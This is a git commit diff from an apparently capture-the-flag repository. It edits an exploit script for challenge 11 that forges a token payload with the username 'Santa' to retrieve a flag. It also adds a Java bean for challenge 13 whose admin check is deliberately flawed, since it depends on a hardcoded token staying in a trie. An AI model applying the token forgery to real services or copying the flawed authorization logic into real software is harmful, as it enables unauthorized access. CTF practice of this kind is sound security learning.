Day 13 started

2019-12-13 00:32:54 +01:00 · 2019-12-13 00:32:54 +01:00 · f36aa42aa9
commit f36aa42aa9
parent 3cdd94b727
2 changed files with 66 additions and 5 deletions
--- a/11/exploit.py
+++ b/11/exploit.py
@ -20,14 +20,15 @@ def registerUser():
            return

        print("Server returned %d %s" % (res.status_code, res.reason))
-        print(res.text)
+        print(data)
        exit(1)

 def getFlag():
    payload = {
      "user": {
-        "username": USERNAME,
-        "platinum": True
+        "username": "Santa",
+        "password": PASSWORD,
+        "platinum": False
      },
      "exp": time.time() + 60*60
    }
@ -42,5 +43,6 @@ def getFlag():
    data = res.text
    print(json.loads(data)["joke"])

-registerUser()
-getFlag()
+if __name__ == "__main__":
+    registerUser()
+    getFlag()
--- a/13/NotesBean.java
+++ b/13/NotesBean.java
@ -0,0 +1,59 @@
+package com.jwt.jsf.bean;
+import org.apache.commons.collections4.trie.PatriciaTrie;
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.Serializable;
+import java.io.StringWriter;
+
+import javax.faces.bean.ManagedBean;
+import javax.faces.bean.SessionScoped;
+import static org.apache.commons.lang3.StringEscapeUtils.unescapeJava;
+import org.apache.commons.io.IOUtils;
+
+@ManagedBean(name="notesBean")
+@SessionScoped
+public class NotesBean implements Serializable {
+
+	/**
+	 *
+	 */
+	private PatriciaTrie<Integer> trie = init();
+	private static final long serialVersionUID = 1L;
+	private static final String securitytoken = "auth_token_4835989";
+
+	public NotesBean() {
+	    super();
+	    init();
+	}
+
+	public String getTrie() throws IOException {
+		if(isAdmin(trie)) {
+			InputStream in=getStreamFromResourcesFolder("data/flag.txt");
+			StringWriter writer = new StringWriter();
+			IOUtils.copy(in, writer, "UTF-8");
+			String flag = writer.toString();
+
+			return flag;
+		}
+		return "INTRUSION WILL BE REPORTED!";
+	}
+
+	public void setTrie(String note) {
+		trie.put(unescapeJava(note), 0);
+	}
+
+  private static PatriciaTrie<Integer> init(){
+    PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
+    trie.put(securitytoken,0);
+    return trie;
+  }
+
+  private static boolean isAdmin(PatriciaTrie<Integer> trie){
+    return !trie.containsKey(securitytoken);
+  }
+
+  private static InputStream getStreamFromResourcesFolder(String filePath) {
+  	return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
+  }
+}